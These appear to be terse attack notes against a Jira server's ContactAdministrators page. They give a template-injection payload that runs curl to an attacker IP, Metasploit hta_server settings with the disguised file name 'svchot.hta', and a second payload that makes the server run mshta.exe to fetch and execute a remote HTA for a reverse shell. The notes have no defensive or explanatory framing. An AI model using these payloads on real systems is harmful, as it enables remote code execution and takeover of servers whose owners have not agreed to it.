http://localhost:8080/secure/ContactAdministrators!default.jspa
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://attackerIP').waitFor()
Module:
use exploit/windows/misc/hta_server
Parameters:
set SRVHOST <My-IP>
set SRVPORT <80>
set URIPATH <svchot.hta>
set LHOST <My-IP>
set LPORT <443>
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('mshta.exe http://<My-IP>:80/payload.hta').waitFor()